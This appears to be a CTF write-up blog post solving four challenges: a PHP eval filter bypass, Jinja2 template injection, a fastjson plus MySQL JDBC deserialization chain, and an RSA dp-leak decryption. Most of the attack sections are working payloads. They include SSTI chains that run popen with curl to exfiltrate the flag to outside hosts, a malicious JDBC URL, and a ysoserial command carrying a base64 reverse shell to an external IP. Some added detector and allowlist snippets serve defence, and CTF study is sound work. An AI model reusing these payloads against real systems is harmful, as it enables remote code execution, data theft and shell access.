An internal CTF

ezrce

<?php
highlight_file(__FILE__);
//its a babe bypass
error_reporting(0);
if (isset($_GET['rce'])) {
  if (!empty($_GET['rce'])){
    $printValue= strtolower($_GET['rce']);
    $banned = array("cat", "more" ,"readfile", "fopen", "file_get_contents", "file", "SplFileObject" );
    $special_block= "test";
    $$special_block= "/flag";
    foreach ($banned as $value) {
      if (strpos($printValue, $value) || preg_match('/system|exec|bin2hex|assert|passthru|shell_exec|escapeshellcmd| escapeshellarg|pcntl_exec|usort|popen|flag|special_block|require|scandir|include|hex2bin|getallheaders|strrev|getallheaders|strrev|\\$[a-zA-Z]|[#!%^&*_+=\\-,\\.:`|<>?~\\\\\\\\]/i', $printValue)) {
        $printValue="";
        echo "<script>alert('Bad character/word ditected!');</script>";
        break;
      }
    }
  eval($printValue . ";");
  } 
}
?>

An outrageous bypass

It is a foreign CTF challenge reused as-is:

https://ctf.zeyu2001.com/2021/typhooncon-ctf-2021/impasse

It makes very clever use of PHP variable variables: `$$special_block = "/flag"` defines `$test`, so the payload can reach the path and the banned function name through `${test}` and `${banned}[4]` without ever writing them, which is what the `\$[a-zA-Z]` regex and the keyword list are looking for.

echo+'';print(eval('return ${banned}[4](${test});'))


babyssti

Let's look at the filters (there are more than these, of course):

https://saucer-man.com/information_security/516.html#cl-6

{{
[
space
'
.
{% if ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.linecache.os.popen('curl http://127.0.0.1:4444/?i=`whoami`').read()=='p' %}1{% endif %}


http://127.0.0.1:5000/?name={{()|attr(%22__class__%22)|attr(%22__base__%22)|attr(%22__subclasses__%22)()|attr(%22__getitem__%22)(133)|attr(%22__init__%22)|attr(%22__globals__%22)|attr(%22__getitem__%22)(%22popen%22)(%22whoami%22)|attr(%22read%22)()}}


{{()|attr("%c%c%c%c%c%c%c%c%c"|format(95,95,99,108,97,115,115,95,95))|attr("%c%c%c%c%c%c%c%c"|format(95,95,98,97,115,101,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,115,117,98,99,108,97,115,115,101,115,95,95))()|attr("%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,103,101,116,105,116,101,109,95,95))(133)|attr("%c%c%c%c%c%c%c%c"|format(95,95,105,110,105,116,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,103,108,111,98,97,108,115,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,103,101,116,105,116,101,109,95,95))("popen")("whoami")|attr(%22read%22)()}}


{% if ()|attr("%c%c%c%c%c%c%c%c%c"|format(95,95,99,108,97,115,115,95,95))|attr("%c%c%c%c%c%c%c%c"|format(95,95,98,97,115,101,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,115,117,98,99,108,97,115,115,101,115,95,95))()|attr("%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,103,101,116,105,116,101,109,95,95))(133)|attr("%c%c%c%c%c%c%c%c"|format(95,95,105,110,105,116,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,103,108,111,98,97,108,115,95,95))|attr("%c%c%c%c%c%c%c%c%c%c%c"|format(95,95,103,101,116,105,116,101,109,95,95))("popen")("curl http://boxtkv.ceye.io")|attr(%22read%22)()=="p" %}1{% endif %}

{%if()|attr(%22%c%c%c%c%c%c%c%c%c%22|format(95,95,99,108,97,115,115,95,95))|attr(%22%c%c%c%c%c%c%c%c%22|format(95,95,98,97,115,101,95,95))|attr(%22%c%c%c%c%c%c%c%c%c%c%c%c%c%c%22|format(95,95,115,117,98,99,108,97,115,115,101,115,95,95))()|attr(%22%c%c%c%c%c%c%c%c%c%c%c%22|format(95,95,103,101,116,105,116,101,109,95,95))(132)|attr(%22%c%c%c%c%c%c%c%c%22|format(95,95,105,110,105,116,95,95))|attr(%22%c%c%c%c%c%c%c%c%c%c%c%22|format(95,95,103,108,111,98,97,108,115,95,95))|attr(%22%c%c%c%c%c%c%c%c%c%c%c%22|format(95,95,103,101,116,105,116,101,109,95,95))(%22popen%22)(%22curl$IFS$9http://794828630:2333?c=`cat$IFS$9/fla""gasdcccccc|base64`%22)|attr(%22read%22)()=="p"%}1{%endif%}

Quite a lot is filtered; the important thing is that you need to set up your own environment.


The Flask environment and a plain Python script environment are completely different (the `__subclasses__()` index of the class you need is not the same in both), and that is mainly where I got stuck.
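The `"%c%c..."|format(...)` trick in the payloads above spells `__class__` and friends without a literal quote, dot or underscore, so a keyword filter never sees them. A detector has to undo that encoding before matching. This is an added example, not code from the post or the challenge: the regexes, function names and the constructed sample payloads are all assumptions made here.

```python
import re
from urllib.parse import unquote

# "%c%c%c"|format(95,95,99) builds "__c" at render time; undo it before keyword matching.
_FMT_RE = re.compile(r'"((?:%c)+)"\s*\|\s*format\(\s*([0-9,\s]+)\)')
# Names that virtually every __subclasses__()-walk chain has to touch.
_INDICATOR_RE = re.compile(
    r"__(?:class|base|bases|mro|subclasses|init|globals|builtins|getitem|import)__"
    r"|\bpopen\b|\bos\.system\b"
)

def deobfuscate(payload: str) -> str:
    """URL-decode, then replace each "%c..."|format(...) with the literal it builds."""
    text = unquote(payload)
    def build(m):
        codes = [int(c) for c in m.group(2).split(",") if c.strip()]
        if len(codes) != m.group(1).count("%c"):
            return m.group(0)          # malformed: leave it visible for the analyst
        return '"' + "".join(chr(c) for c in codes) + '"'
    return _FMT_RE.sub(build, text)

def ssti_indicators(payload: str) -> list:
    """Distinct indicator names in the deobfuscated payload, in order of appearance."""
    found = []
    for m in _INDICATOR_RE.finditer(deobfuscate(payload)):
        if m.group(0) not in found:
            found.append(m.group(0))
    return found

# Constructed samples mirroring the shapes quoted above (not the real requests).
SAMPLES = {
    "format_trick": '{{()|attr("%c%c%c%c%c%c%c%c%c"|format(95,95,99,108,97,115,115,95,95))'
                    '|attr("%c%c%c%c%c%c%c%c"|format(95,95,98,97,115,101,95,95))}}',
    "url_encoded": "{{()|attr(%22__class__%22)|attr(%22__base__%22)"
                   "|attr(%22__subclasses__%22)()|attr(%22__getitem__%22)(133)}}",
    "benign": "Hello {{ name }}",
}

if __name__ == "__main__":
    for label, payload in SAMPLES.items():
        print(label, ssti_indicators(payload))
```

Normalising before matching is the point; the same normaliser can feed a WAF rule or a log search, and the real fix remains rendering user input as data rather than as a template.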


easy_java

Restore the jar into a project.

Set it up locally and audit it.


At the admin route the JDBC connection parameters can be set by the user, and the MySQL JDBC driver has a deserialization vulnerability.

Step one: forging admin to bypass the check

At the register route:


As long as the `{username}` pattern is matched, it gets replaced.

https://wx.zsxq.com/dweb2/index/topic_detail/182585211588122

A post on p神's 知识星球 (Knowledge Planet) explains that fastjson supports comments, which can be used to get around the regex match:

http://127.0.0.1/register?user=%7B%22username%22%3A%2F*penson*%2F%22admin%22%2C%22password%22%3A%22guess%22%7D

This injects `admin` as the username.


Log in, take the session, and get into the admin page.

Next comes the JDBC deserialization.

The JDBC driver version is 8.


https://www.mi1k7ea.com/2021/04/23/MySQL-JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/


jdbc:mysql://47.96.31.86:7700/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor


java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45Ni4zMS44Ni8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}"

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45Ni4zMS44Ni8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}
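The defensive counterpart of this section, added here and not part of the challenge or the post: an allowlist gate on a user-supplied JDBC URL that rejects the `autoDeserialize` and `queryInterceptors` properties (and any host that is not configured) before the URL ever reaches the driver. The allowed property names and hosts are assumptions for the example.

```python
from urllib.parse import urlsplit, parse_qs

# Connection properties an operator may legitimately set; everything else, including
# autoDeserialize and queryInterceptors, is rejected. This set is an assumption for the
# example: extend it only with names the application actually needs.
ALLOWED_PROPERTIES = {"usessl", "servertimezone", "characterencoding", "connecttimeout"}

def validate_jdbc_url(url: str, allowed_hosts) -> tuple:
    """Gate a user-supplied MySQL JDBC URL before it reaches the driver.

    Returns (True, "ok") or (False, reason). Only the plain single-host form
    jdbc:mysql://host[:port]/db?prop=value&... is accepted.
    """
    if not url.startswith("jdbc:mysql://"):
        return False, "not a plain jdbc:mysql:// URL"
    parts = urlsplit(url[len("jdbc:"):])          # mysql://host:port/db?props
    if parts.hostname is None or parts.hostname not in allowed_hosts:
        return False, f"host {parts.hostname!r} is not in the allowlist"
    if "@" in parts.netloc:                       # credentials belong in the DataSource, not the URL
        return False, "userinfo in URL"
    for key in parse_qs(parts.query, keep_blank_values=True):
        if key.lower() not in ALLOWED_PROPERTIES:
            return False, f"property {key!r} is not in the allowlist"
    return True, "ok"

# Constructed inputs: an expected URL and the shape of the one used in the challenge
# (203.0.113.5 is a documentation address, not the real host).
GOOD = "jdbc:mysql://db.internal:3306/app?useSSL=true&serverTimezone=UTC"
BAD = ("jdbc:mysql://203.0.113.5:7700/test?autoDeserialize=true"
       "&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor")

if __name__ == "__main__":
    for u in (GOOD, BAD):
        print(validate_jdbc_url(u, {"db.internal"}))
```

The gate is a second layer only; the real fix is to never build a DataSource from user-controlled input in the first place.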

easy_rsa

The original challenge is from the Yangcheng Cup (羊城杯):

[羊城杯 2020]Power

Copy the script and tweak it:

import sympy
from Crypto.Util.number import long_to_bytes

x = 4081589335861545789835900064099635357096399307337433897589803884626402434977432990016139226375481290410727489054239869962196583881117103323966736211566475539446678319618093115175112507069500173061215448325773249332796885624377362206444530510862480133054015065963334293387568286441905700716121965839808869357354006128877042545439515369257271569914721144973246451659098340370835404858757446411467741537214371880806558890311566169561294743201198192296369009590146133590
c=25562696992733536309182393779981779194240154099429561071032280334763645594896471389578060860342401623942484948987716140390982592619521666792424752334479246961649746061040166020085170757237115563084113762532741403917411315342519136738879919867100264184573200481028092895743894796816962164203221470918044930335749213176218455777516922130048195365976773635904361747281900075574599122502341481491609282116651135302435182241327211649334973233884028113185901584769019028117675925853042867198133957188908318016744666365319241377018102421574351449756122789387653293735302629918910002538784361049010374950779639892697081213057
dp=5260952459703133229911581653786151165351615592380635657675026312493642098695058018540694433892583077117305420684484097529438374197142471836138466810277803
# The challenge gives x = 2021*p^3 + 2019*p^2 + 2020, so p is the integer root of this cubic
p = sympy.symbols("p")
a = sympy.solve([2021*p**3 + 2020 + 2019*p**2 - x], [p])
# print(a)  # the real root printed here was copied into p below
p=12640211216466775763050017481547933750912814131973813802729339716313957628118122130773233534260300514170797571411776745968647678621480594520108761936619731

# dp = d mod (p-1), so pow(c, dp, p) gives m mod p, which is m itself as long as m < p
m = pow(c, dp, p)
print(long_to_bytes(m))
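The same dp-only decryption as the script above, as an added example that is not the post's code: the cubic is solved by integer binary search instead of sympy (it is strictly increasing for p >= 0, so a unique integer root is found or the input is rejected), and it runs against a constructed toy keypair with small primes so the whole chain can be checked end to end.

```python
# Added example: recover p from x = 2021*p^3 + 2019*p^2 + 2020 without sympy, then
# decrypt with only dp = d mod (p-1). Toy parameters below are constructed for the demo.

def poly(p: int) -> int:
    return 2021 * p**3 + 2019 * p**2 + 2020

def recover_p(x: int) -> int:
    """Return the integer p with poly(p) == x; poly is increasing for p >= 0."""
    lo, hi = 0, 1
    while poly(hi) < x:            # find an upper bound by doubling
        hi *= 2
    while lo < hi:                 # smallest p with poly(p) >= x
        mid = (lo + hi) // 2
        if poly(mid) < x:
            lo = mid + 1
        else:
            hi = mid
    if poly(lo) != x:
        raise ValueError("x is not 2021*p^3 + 2019*p^2 + 2020 for any integer p")
    return lo

def decrypt_with_dp(c: int, dp: int, p: int) -> int:
    """dp = d mod (p-1), so c^dp = m (mod p) by Fermat; equals m only if m < p."""
    return pow(c, dp, p)

# Constructed toy keypair (small primes, demonstration only).
P, Q, E = 1000003, 1000033, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))
DP = D % (P - 1)
M = 0xBEEF                        # plaintext, deliberately smaller than P
C = pow(M, E, N)
X = poly(P)                       # what the challenge hands out instead of p

def solve(x: int = X, c: int = C, dp: int = DP) -> int:
    return decrypt_with_dp(c, dp, recover_p(x))

if __name__ == "__main__":
    print(hex(solve()))           # 0xbeef
```

If the message were larger than p, pow(c, dp, p) would only yield m mod p and the q side (dq and a CRT recombination) would be needed as well.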

Author: penson
Link: https://www.penson.top
Copyright notice: unless otherwise stated, all articles on this blog are licensed under CC BY 4.0. Please credit penson as the source when reposting!